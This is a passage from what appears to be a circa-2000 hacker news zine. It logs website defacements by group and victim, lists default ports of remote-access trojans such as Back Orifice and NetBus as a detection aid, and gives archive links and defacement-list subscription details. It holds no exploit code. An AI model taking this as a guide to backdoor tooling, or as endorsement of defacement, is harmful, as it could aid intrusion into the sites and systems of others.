(www.cookbooksonline.com) [00.07.07] NT [McM4nus] www.lapampa.gov.ar (www.lapampa.gov.ar) [00.07.07] Li [Gforce Pakistan] Dev Sahai (www.agmoz.com) [00.07.07] Lr [GForce Pakistan] M Confluent Technologies Inc. 
(www.bittown.com) [00.07.07] NT [cyberpriest] Boise County Internet Site (www.co.boise.id.us) [00.07.07] Li [Crime Boys] Alamo Administradora e Corretora de Seguros LTDA (www.convergence.com.br) [00.07.07] Bi [Arogance] Thomas Ecker (www.ecker-online.de) [00.07.07] Li [Crime Boys] Allfarma Comercial Ltda (www.lrtur.com.br) [00.07.07] NT [ANALISTA] Idol Minds (www.idolminds.com) [00.07.07] NT [ANTI-ZONCKED] COTASnet (www.cotas.com.bo) [00.07.07] NT [Crime Boys] M EDI Informatica LTDA (www.edinternet.com.br) [00.07.07] So [rootworm] University of St Francis (www.stfrancis.edu) [00.07.07] NT [SuBZeRo] M Lady Furniture Co. Ltd (www.lady.co.kr) [00.07.07] 2k [SuBZeRo] MEGAMEDICAL IND. CO., LTD. (www.megamedical.co.kr) [00.07.07] NT [M3L40] Cinemark US (www.cinemark.com) [00.07.06] NT [McM4nus] Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar) [00.07.06] NT [McM4nus] Sernah (AR) (www.sernah.gov.ar) [00.07.06] NT [McM4nus] INTA Est. Exp. Agr. Saenz Peqa (saenzpe.inta.gov.ar) [00.07.06] NT [ANALISTA] Centro Federal de Educagco Tecnolsgica do Parana (www.cefetpr-unedcp.br) [00.07.06] NT [ANALISTA] Vianna & Zogheib LTDA (www.lpnet.com.br) [00.07.06] NT [McM4nus] Municipalidad Ciudad de Cordoba (www.cordoba.gov.ar) [00.07.06] NT [M3L40] Ministerio de Educacisn Nacional (www.mineducacion.gov.co) [00.07.06] NT [Urbanus-BR] Bitcom (KR) (web.bitcom.co.kr) [00.07.06] Li [Crime Boys] Allfarma Comercial Ltda (www.livretur.com.br) [00.07.06] Li [Crime Boys] Cultura Ensinamentos Ltda (www.experimental.com.br) [00.07.06] NT [M3L40] Corteconti (www.corteconti.it) [00.07.06] Lr [Lotus] South Burlington School District (www.sburl.k12.vt.us) [00.07.06] NT [st3althy6 labs] MSD of Martinsville (msdadmin.scican.net) [00.07.06] NT [hackforce2000] Colorado School of Mines (oia.mines.edu) [00.07.06] Bi [team holocaust] Boy Scout Troop 389 (www.troop389.com) [00.07.06] NT [hackforce2000] Roanoke College (www.roanoke.edu) [00.07.06] NT [DrDoug] Orlandia Equip. 
Tecnicos Ltda (www.orlatec.com.br) [00.07.06] Li [ ] Goudvisse (www.goudvisse.com) [00.07.06] Li [UPL] Auto Restoration Inc. (www.autorestorationinc.com) [00.07.06] NT [x-s4nd3r] Ministero dei Trasporti e della Navigazione (www.trasportinavigazione.it) [00.07.06] Bf [artech] Northern California Fire Prevention Officers Association (www.norcal-fpo.org) [00.07.06] NT [votos locos] Mississippi State Personnel Board Website (www.spb.state.ms.us) [00.07.06] So [GForce Pakistan] M Midwest Group (www.bwtc.net) [00.07.06] Lr [GForce Pakistan] The Group 3 (www.thegroup3.com) [00.07.06] NT [hackforce] Ministerul Finantelor - Centrul de Tehnologia Informatiei Financiare (www.mfinante.ro) [00.07.06] Lr [shitkingz] M Bradley Byrnes (www.icmcomputers.com) [00.07.06] NT [obzerve] Checkmate Management Ltd (www.checkmate.com) [00.07.06] NT [Crime Boys] Bulgarian Government (www.mjeli.government.bg) [00.07.06] NT [Crime Boys] Spider Informatica LTDA (www.spider-df.com.br) [00.07.06] NT [Utreg] McManus and Sons (www.mcmanus.com) [00.07.05] NT [M3L40] Companhia De Informatica Do Parana - Celepar (celepar7.pr.gov.br) [00.07.05] Li [Crime Boys] Jucelia Queiroz Amaral (www.stepcell.com.br) [00.07.05] NT [M3L40] Centro Virtual de Estudos Polmticos (cevep.ufmg.br) [00.07.05] Lr [GForce Pakistan] networksetc.net (www.networksetc.net) [00.07.05] Lr [GForce Pakistan] www.mckenzieonline.com (www.mckenzieonline.com) [00.07.05] NT [M3L40] Kingdom of Saudi Arabia, minstery of information (www.spa.gov.sa) [00.07.05] Lr [GForce Pakistan] NOAA, U.S. Department of Commerce (www.NauticalCharts.gov) [00.07.05] NT [doodoo krew] Spokane Police Department (www.spokanepolice.org) [00.07.05] NT [cyberpriest] apiit.edu.my (apiit.edu.my) [00.07.05] C6 [Till] Employee Selection & Dev. Inc (www.employeeselect.com) [00.07.05] NT [cdrz/liasons] Retro Gallery (www.retro-online.com) [00.07.04] NT [fl3m] Shear Healthcare Resources, Inc. 
(www.shrmedquest.com) [00.07.04] So [ch1ck1e] Nerp (www.nerp.org) [00.07.04] BI [O ANALISTA] As Informatica Ltda (www.asinformaticabh.com.br) [00.07.04] NT [Crime Boys] Verbatim Corporation (www.verbatim.com) [00.07.04] Lr [shitkingz] M Oak Lawn Condos (www.oaklawncondos.com) [00.07.04] Li [Crime Boys] Marinho Assessoria Empresarial Ltda (www.marinhoassessoria.com.br) [00.07.04] Lr [mOs] Center for Advanced Technology (www.cat.gov.in) [00.07.04] NT [dobe and epic] Austin Peay State University (www.apsu.edu) [00.07.04] Lr [shitkingz] OMI, Inc (www.ofsnet.com) [00.07.04] NT [fish] Znet Tecnologia Aplicada (www.znet.com.br) [00.07.04] Lr [GForce Pakistan] MC Sony Entertainment Television Pvt. Ltd. (www.setindia.com) [00.07.04] Li [shitkingz] Darcy Brown (www.scarletpimp.com) [00.07.04] NT [#bash krew] Pennsylvania State System of Higher Education (www.sshechan.edu) [00.07.04] Lr [shitkingz] Huzzah! (white-star.org) [00.07.04] NT [never] New Jersey K12 Schools (www.peddie.k12.nj.us) [00.07.04] Lr [shitkingz] Digital Products (www.digital-p.com) [00.07.04] NT [cyberpriest] Canberra Edu (AU) (beth.canberra.edu.au) [00.07.04] NT [Jak/KP] C Editors Press Service (www.editorspress.com) [00.07.04] Lr [shitkingz] Burney Van Stone (www.burneyvanstone.com) [00.07.04] Li [shitkingz] The Eden Family (aaron.edenfamily.com) [00.07.04] Lr [shitkingz] Xoltrex (www.xoltrex.com) [00.07.04] NT [rapeworm] UltraNet Communications, Inc. (atserver.nh.ultranet.com) [00.07.04] Lr [shitkingz] pstu.pi.net.ua (pstu.pi.net.ua) [00.07.04] NT [wds] Anqui Gov (CN) (www.anqiu.gov.cn) [00.07.04] NT [Crime Boys] Facultad de Ciencias Econsmicas y de Administracisn (www.eco.unca.edu.ar) [00.07.04] NT [DeXeR] Oklahoma City University (www.okcu.edu) [00.07.04] NT [obzerve] C Whittier Partners (www.whittier.com) [00.07.04] Li [The Itch] Meredith Frederick Designs Ltd. 
(www.meredithfrederick.com) [00.07.04] NT [cyberpriest] www.bhak-frk.asn-bgld.ac.at (www.bhak-frk.asn-bgld.ac.at) [00.07.04] NT [cyberpriest] www.lycee.asn-wien.ac.at (www.lycee.asn-wien.ac.at) [00.07.04] NT [wds] web.cei.gov.cn (web.cei.gov.cn) [00.07.04] NT [wds] Kentucky K12 Schools (b-g.k12.ky.us) [00.07.04] Bf [Digital insanity] Igor Zingerman (aps.imperfect.net) [00.07.04] NT [cdrz] Ontario Secondary School Students' Association (www.osssa.org) [00.07.04] NT [Octane] Michael Smith (Puff Online) (www.puff-online.com) [00.07.03] NT [jak/kp] C Collectible Toys (www.collectibletoys.com) [00.07.03] NT [St3althy6 Labs] Utah K12 Schools (www.daggett.k12.ut.us) [00.07.03] NT [Digit-0] Lund Performance Solutions (www.lund.com) [00.07.03] So [GForce Pakistan] M Peng T. Ong (www.secondbeat.com) [00.07.03] NT [rapeworm] NSPlanning Inc. (cue21.nsplanning.co.jp) [00.07.03] Li [Crime Boys] Claudionor Ramos Advocacia E Consultoria Empresari (www.preferido.com.br) [00.07.03] 2k [jak] C The Sedlaks (www.sedlaks.com) [00.07.03] So [al & mei] Openhack -- eWEEK Emporium Catalog (www.openhack.com/cgi-bin/eweekorcl) [00.07.03] NT [Anti-Zoncked] Electroid Company (www.electroid.com) [00.07.03] NT [Hacker Jak] C John McElroy (www.e3online.com) [00.07.03] 95 [obzerve] C IDEA QUEST UNLIMITED (www.ideaquestunlimited.com) [00.07.03] Li [l4m3r cr3wz] C Michael Adolph (www.god-crew.de) [00.07.03] NT [SuBZeRo] www.ahone.co.kr (www.ahone.co.kr) [00.07.03] NT [cyberpriest] Bundes Gymnasium Schwechat (www.bg-schwechat.asn-wien.ac.at) [00.07.03] NT [cyberpriest] Gymnasium & Real-Gymnasium Wien 11 (www.grg11.asn-wien.ac.at) [00.07.03] NT [DeXeR] DTS Software (www.dtssoftware.com) [00.07.03] NT [wds] California K12 Schools (lausdnet01.lausd.k12.ca.us) [00.07.03] NT [rapeworm] New Media BC (www.newmediabc.com) [00.07.03] Lr [acid] James Knowles (Digital IRC) (www.digital-irc.net) [00.07.02] NT [jak] C Ed Guy (www.edguy.com) [00.07.02] Li [Crime Boys] Cunha Lanfermann Engenharia Ltda 
(www.projetosenegocios.com.br) [00.07.02] Li [datagram] Dayton Internet Services, Inc (www.dayton.com) [00.07.02] NT [rapeworm] Inglenet Software Corporation (www.merchantbridge.com) [00.07.02] NT [wds] California K12 Schools (nevco.k12.ca.us) [00.07.02] NT [rapeworm] Icron Systems Inc (www.icron.com) [00.07.02] NT [rapeworm] Inglenet Software Corp (iscnt2.inglenet.com) [00.07.02] NT [IZ Corp] Medical School, UCLA (www.pathnet.medsch.ucla.edu) [00.07.02] NT [Crime Boys] Pagina Oficial del M.G.A.P. (www.mgap.gub.uy) [00.07.02] Lm [rmImJ3c1PgFt2] Root-bega (www.r00tabega.com) [00.07.02] NT [rapeworm] Derived Systems, Inc (nt40-2.derived.com) [00.07.02] NT [Urbanus-BR] University of Tartu, Estonia (ois.oppe.ut.ee) [00.07.02] NT [Urbanus-BR] Israeli ORG (sdeyoav) (www.sdeyoav.org.il) [00.07.02] So [fluffi bunni] Official #EnglishPub Home Page (www.englishpub.co.uk) [00.07.02] Li [SoLDaTeK] West Yorkshire Broadcasting (www.magic828.co.uk) [00.07.02] Li [SuBZeRo] Israeli Commercial (www.bookkeeper.co.il) [00.07.02] NT [Jak] C Sarasota Amateur Radio Association (www.saraclub.org) [00.07.02] 2k [Jak] The Steel Network (www.studplank.com) [00.07.01] NT [Cyb3r Fuck3rs] Monumentos Historicos Nacionales (www.monumentos.gov.ar) [00.07.01] NT [McM4nus] Universitaet Zuerich (www.isb.unizh.ch) [00.07.01] Bi [DavidLetterman] Grace House Ministries (www.gracehouse.org) [00.07.01] NT [kenton] Rahal Schmitz Toyota (www.rahalschmitztoyota.com) [00.07.01] NT [System_Error_] Edition Net (nt1.edition.net) [00.07.01] NT [ka0x] angelcity.wingnet.com.tw (angelcity.wingnet.com.tw) [00.07.01] Lb [#svun] Superlearning Inc. 
(www.superlearning-inc.com) [00.07.01] NT [DeXeR] United Nations Development Programme (www.unchina.org) [00.07.01] NT [DeXer] Stillemans (www.stillemans.com) [00.07.01] Li [SuBZeRo] www.ishyprint.co.il (www.ishyprint.co.il) [00.07.01] NT [DeXeR] College of New Caledonia (www.cnc.bc.ca) [00.07.01] NT [DeXeR] Association of South Central Oklahoma Governments (www.ascog.org) [00.07.01] NT [St3althy6 Labs] North Dakota K12 Schools (www.cavalier.k12.nd.us) [00.07.01] Li [cyb3r fuck3rs] White Force (www.whiteforce.com) [00.07.01] NT [Crime Boys] All Ways Provedor de Acesso Internet (www.cult.com.br) Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ========================================================================== * Info supplied by the attrition.org mailing list. 
Cracked webpage archives (list from attrition)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/
http://www.hackernews.com/archive/crackarch.html
http://www.freespeech.org/resistance/
http://www.rewted.org/cracked/
http://www.403-security.org/
http://www.projectgamma.com/defaced/
http://www.ironboxtech.com/articles/
http://www.net-security.org/
http://www.netrus.net/users/beard/pages/hacks/
http://212.205.141.128/grhack/html/default_hacking.html
http://194.226.45.195/hacked/hacked.html
http://alldas.de/crkidx1.htm ** NEW URL *** -> http://defaced.alldas.de
http://www.turkeynews.net/Hacked
http://www.flashback.se/hack/
http://www.dutchthreat.org/
http://www.onething.com/archive/
http://www.2600.com/hacked_pages/
http://hysteria.sk/hacked/
http://erazor.vrnet.gr/

Cracked sites listed oldest to most recent...does anyone read these? huh? do ya? heh.

and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

By: joakim.von.braun@risab.se
Source: PSS

Common Trojan ports to watch for:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

After seeing several questions about traffic directed at ports such as 31337
and 12345, I've put together a list of all trojans known to me and the default
ports they are using. Of course several of them could use any port, but I hope
this list will maybe give you a clue as to what might be going on.
port 21    - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23    - Tiny Telnet Server
port 25    - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy
port 31    - Hackers Paradise
port 80    - Executor
port 456   - Hackers Paradise
port 555   - Ini-Killer, Phase Zero, Stealth Spy
port 666   - Satanz Backdoor
port 1001  - Silencer, WebEx
port 1011  - Doly Trojan
port 1170  - Psyber Stream Server, Voice
port 1234  - Ultors Trojan
port 1245  - VooDoo Doll
port 1492  - FTP99CMP
port 1600  - Shivka-Burka
port 1807  - SpySender
port 1981  - Shockrave
port 1999  - BackDoor
port 2001  - Trojan Cow
port 2023  - Ripper
port 2115  - Bugs
port 2140  - Deep Throat, The Invasor
port 2801  - Phineas Phucker
port 3024  - WinCrash
port 3129  - Masters Paradise
port 3150  - Deep Throat, The Invasor
port 3700  - Portal of Doom
port 4092  - WinCrash
port 4590  - ICQTrojan
port 5000  - Sockets de Troie
port 5001  - Sockets de Troie
port 5321  - Firehotcker
port 5400  - Blade Runner
port 5401  - Blade Runner
port 5402  - Blade Runner
port 5569  - Robo-Hack
port 5742  - WinCrash
port 6670  - DeepThroat
port 6771  - DeepThroat
port 6969  - GateCrasher, Priority
port 7000  - Remote Grab
port 7300  - NetMonitor
port 7301  - NetMonitor
port 7306  - NetMonitor
port 7307  - NetMonitor
port 7308  - NetMonitor
port 7789  - ICKiller
port 9872  - Portal of Doom
port 9873  - Portal of Doom
port 9874  - Portal of Doom
port 9875  - Portal of Doom
port 9989  - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack'99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil

You'll find the list at the following address:
http://www.simovits.com/nyheter9902.html
(still in Swedish but it will be translated in the near future).

To help anyone detect trojan attacks, I'm planning to add information about the
original names of the executables, their size, where they usually are hiding,
and the names of any helpfiles they may use. I will also add tools or links to
tools that may be of assistance to you.

Feel free to get back to me with any comments or suggestions. If you find new
trojans I'd love to get my hands on them, but please mail me first, as I don't
need more than one copy. If you have live experience of trojan attacks I'm
interested to read about your findings.

Joakim
joakim.von.braun@risab.se

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section
on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHANGED TO -> http://defaced.alldas.de
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have
security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address* (Dutch)
                http://www.securax.org/ *New*
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/ -> http://defaced.alldas.de
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za ** DOWN AGAIN **
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and
                best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to cruciphux@dok.org and i'll review it
and post it here if it merits it.

@HWA

A.2 Hot Hits
~~~~~~~~

Useless information for the curious: Country and domain hits to the main news
page main.php on hwa-security.net. Only the top few countries are listed; this
counter was activated 12 Aug 2000 and little to no advertising has been done
(as is obvious from our hits). It IS interesting to see that Europe is our
biggest draw.

* The site and zine author and core HWA crew are based in Canada.

Pageviews per domain

 1. Network              987  15.95 %
 2. US Commercial        818  13.21 %
*3. Canada               207   3.34 %
 4. US Educational       168   2.71 %
 5. Netherlands          160   2.58 %
 6. Germany              139   2.25 %
 7. Australia            103   1.66 %
 8. Brazil                82   1.32 %
 9. Sweden                80   1.29 %
10. United Kingdom        76   1.23 %
11. Croatia (Hrvatska)    72   1.16 %
12. Norway                67   1.08 %
13. Malaysia              53   0.86 %
14. France                53   0.86 %
15. Nicaragua             39   0.63 %
16. Hungary               38   0.61 %
17. Russian Federation    37   0.6 %
18. Taiwan                37   0.6 %
19. Israel                36   0.58 %
20. Korea (South)         35   0.57 %
21. Poland                35   0.57 %
22. Unknown             2247  36.3 %

Plus 70+ other countries showed trickledowns also.

Pageviews per region

1. North-America        1247  20.15 %
2. Europe               1073  17.33 %
3. None (.net, .org)    1019  16.46 %
4. Asia                  275   4.44 %
5. Australia             125   2.02 %
6. South America         117   1.89 %
7. Central America        67   1.08 %
8. Africa                 20   0.32 %
-  Unknown              2247  36.3 %

Note the coverage, an interesting spread. Several hits come from sites like
.gov that were defaced by SKRU, GForce Pakistan and provided links to our page
on their defacements. Jury is out as to whether this is a good or bad thing.
I'll take it as a good thing for now. :p

@HWA

A.3 Mirror Sites List
~~~~~~~~~~~~~~~~~
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Some of these are not keeping up with new issues like they should be, you can
always get the latest issue from www.csoft.net/~hwa or join us on IRC (EFnet)
in channel #hwa.hax0r.news and check the topic or ask Cruciphux where the
latest issues may be attained.

I also upload all issues to etext.org, the zines are available thru their ftp
service, updates are slow. - Ed

New mirror sites

*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
*** http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.attrition.org/hosted/hwa/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

*   Crappy free sites of no use to anyone. too lazy to kill em.
*** Most likely to be up to date other than the main site.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
  and -> http://defaced.alldas.de
http://www.csoft.net/~hwa/
http://welcome.to/HWA.hax0r.news/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

@HWA

A.4 The hacker's Ethic (90's Style)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic. This ethic was best
formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer
Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking, not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.

@HWA

A.5 Sources *** (VERY incomplete)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance). Unless otherwise noted, like msgs
from lists or news from other sites, articles and information are compiled
and/or sourced by Cruciphux; no copyright claimed.

News site.........................http://www.ukhackers.com/ *NEW*
News site.........................http://www.hackernews.com.br/ *NEW*
News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
*News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ (lophtcrack)...http://www.l0pht.com/
NewsTrolls (daily news)...........http://www.newstrolls.com/
General Security/Exploits.........http://packetstorm.securify.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
News/Technology ..................http://www.technologyevaluation.com/

* HNN also archives back issues of their news; use the following url format
  http://www.hackernews.com/arch.html?012700 where 01=Jan 27=Date 00=Year.
  They are archived here also as part of the compilation and broad
  archival concept we are trying to maintain with this publication. - Ed

+ Various mailing lists and some newsgroups, such as ...
+ other sites available on the HNN affiliates page, please see
  http://www.hackernews.com/affiliates.html as they seem to be popping
  up rather frequently ... see the http://hwa-security.net links section
  for more.

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>

@HWA

A.6 Resources
~~~~~~~~~~~~~

Pulled for reworking.

EoF

A.7 Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide; if no response is received within a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and it may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN
affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse, hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed

A.8 Mailing list Info
~~~~~~~~~~~~~~~~~~~~~

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html

--

defaced [web page defacement announce list]

This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of the mail.

There will be two types of posts to this list:

1. brief announcements as we learn of a web defacement. this will include
   the site, date, and who signed the hack. we will also include a URL of
   a mirror of the hack.
2. at the end of the day, a summary will be posted of all the hacks of
   the day. these can be found on the mirror site listed under 'relevant
   links'

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
  Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
  ATTRITION Mirror: http://www.attrition.org/mirror/

(1) It is low volume on a normal day. On days of many defacements,
    traffic may be increased. On a few days, it is a virtual mail flood.
    You have been warned.
;)

-=-

--

defaced summary [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced domains
on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.

There will be ONE type of post to this list:

1. a single nightly piece of mail listing all reported domains. the same
   information can be found on http://www.attrition.org/mirror/attrition/
   via sporadic updates.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
  Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
  ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced
government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe
defaced-gm" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil)
   system defaced. the same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel
charged with tracking security incidents on government run networks.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
  Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
  ATTRITION Mirror: http://www.attrition.org/mirror/

--

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce via alpha-numeric pagers all
publicly defaced government and military domains on a given day. To
subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with
"subscribe defaced-alpha" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil)
   system defaced. the information will only include domain names. the
   same information can be found on
   http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel
charged with tracking security incidents on government run networks.
Further, it is designed for quick response and aimed at law enforcement
agencies like DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within 12 hours of
receiving the mail to be subscribed. If the response is not received, it
